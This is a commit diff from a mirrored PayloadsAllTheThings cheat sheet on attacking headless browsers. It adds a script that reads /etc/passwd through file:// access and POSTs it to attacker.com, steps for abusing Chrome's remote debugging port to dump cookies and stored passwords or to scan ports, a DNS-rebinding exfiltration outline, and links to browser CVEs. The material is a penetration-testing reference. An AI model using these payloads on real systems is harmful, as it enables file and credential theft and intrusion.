gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-12-12 15:49:38 -08:00
Code Issues Packages Projects Releases Wiki Activity

Headless Browser + JSON Jackson

Browse Source
This commit is contained in:
Swissky
2025-07-02 22:23:13 +02:00
parent aaf6bdf394
commit 3fd2f8c481
3 changed files with 192 additions and 7 deletions
Download Patch File Download Diff File Expand all files Collapse all files

65
Headless Browser/README.md
View File

@@ -7,10 +7,11 @@
* [Headless Commands](#headless-commands)
* [Local File Read](#local-file-read)
* [Debugging Port](#debugging-port)
* [Remote Debugging Port](#remote-debugging-port)
* [Network](#network)
* [Port Scanning](#port-scanning)
* [DNS Rebinding](#dns-rebinding)
* [CVE](#cve)
* [References](#references)
## Headless Commands
@@ -37,6 +38,31 @@ Example of headless browsers commands:
## Local File Read
### Insecure Flags
If the target is launched with the `--allow-file-access` option
```ps1
google-chrome-stable --disable-gpu --headless=new --no-sandbox --no-first-run --disable-web-security -allow-file-access-from-files --allow-file-access --allow-cross-origin-auth-prompt --user-data-dir
```
Since the file access is allowed, an atacker can create and expose an HTML file which captures the content of the `/etc/passwd` file.
```js
<script>
async function getFlag(){
response = await fetch("file:///etc/passwd");
flag = await response.text();
fetch("https://attacker.com/", { method: "POST", body: flag})
};
getFlag();
</script>
```
### PDF Rendering
Consider a scenario where a headless browser captures a copy of a webpage and exports it to PDF, while the attacker has control over the URL being processed.
Target: `google-chrome-stable --headless[=(new|old)] --print-to-pdf https://site/file.html`
* Javascript Redirect
@@ -61,7 +87,9 @@ Target: `google-chrome-stable --headless[=(new|old)] --print-to-pdf https://site
</html>
```
## Debugging Port
## Remote Debugging Port
The Remote Debugging Port in a headless browser (like Headless Chrome or Chromium) is a TCP port that exposes the browsers DevTools Protocol so external tools (or scripts) can connect and control the browser remotely. It usually listen on port **9222** but it can be changed with `--remote-debugging-port=`.
**Target**: `google-chrome-stable --headless=new --remote-debugging-port=XXXX ./index.html`
@@ -77,10 +105,21 @@ Target: `google-chrome-stable --headless[=(new|old)] --print-to-pdf https://site
* Connect and interact with the browser: `chrome://inspect/#devices`, `opera://inspect/#devices`
* Kill the currently running browser and use the `--restore-last-session` to get access to the user's tabs
* Dump cookies:
* Stored data: `chrome://settings`
* Data stored in the settings (username, passwords, token): `chrome://settings`
* Port Scan: In a loop open `http://localhost:<port>/json/new?http://callback.example.com?port=<port>`
* Leak UUID: Iframe: `http://127.0.0.1:<port>/json/version`
```json
{
"Browser": "Chrome/136.0.7103.113",
"Protocol-Version": "1.3",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/136.0.0.0 Safari/537.36",
"V8-Version": "13.6.233.10",
"WebKit-Version": "537.36 (@76fa3c1782406c63308c70b54f228fd39c7aaa71)",
"webSocketDebuggerUrl": "ws://127.0.0.1:9222/devtools/browser/d815e18d-57e6-4274-a307-98649a9e6b87"
}
```
* Local File Read: [pich4ya/chrome_remote_debug_lfi.py](https://gist.github.com/pich4ya/5e7d3d172bb4c03360112fd270045e05)
* Node inspector `--inspect` works like a `--remote-debugging-port`
@@ -122,6 +161,23 @@ Port Scanning: Timing attack
5. Chrome will attempt to connect to the IPv6 but as it will fail it will fallback to the IPv4
6. From top window, inject script into iframe to exfiltrate content
## CVE
Exploiting a headless browser using a known vulnerability (CVE) involves several steps, from vulnerability research to payload execution. Below is a structured breakdown of the process:
Identify the headless browser with the User-Agent, then choose an exploit targeting the browser's component: V8 engine, Blink renderer, Webkit, etc.
* Chrome CVE: [2024-9122 - WASM type confusion due to imported tag signature subtyping](https://issues.chromium.org/issues/365802567), [CVE-2025-5419 - Out of bounds read and write in V8](https://nvd.nist.gov/vuln/detail/CVE-2025-5419)
* Firefox : [CVE-2024-9680 - Use after free](https://nvd.nist.gov/vuln/detail/CVE-2024-9680)
The `--no-sandbox` option disables the sandbox feature of the renderer process.
```js
const browser = await puppeteer.launch({
args: ['--no-sandbox']
});
```
## References
* [Browser based Port Scanning with JavaScript - Nikolai Tschacher - January 10, 2021](https://incolumitas.com/2021/01/10/browser-based-port-scanning/)
@@ -131,3 +187,4 @@ Port Scanning: Timing attack
* [Node inspector/CEF debug abuse - HackTricks - July 18, 2024](https://book.hacktricks.xyz/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse)
* [Post-Exploitation: Abusing Chrome's debugging feature to observe and control browsing sessions remotely - wunderwuzzi - April 28, 2020](https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/)
* [Tricks for Reliable Split-Second DNS Rebinding in Chrome and Safari - Daniel Thatcher - December 6, 2023](https://www.intruder.io/research/split-second-dns-rebinding-in-chrome-and-safari)
* [Too Lazy to get XSS? Then use n-days to get RCE in the Admin bot - Jopraveen - March 2, 2025](https://jopraveen.github.io/web-hackthebot/)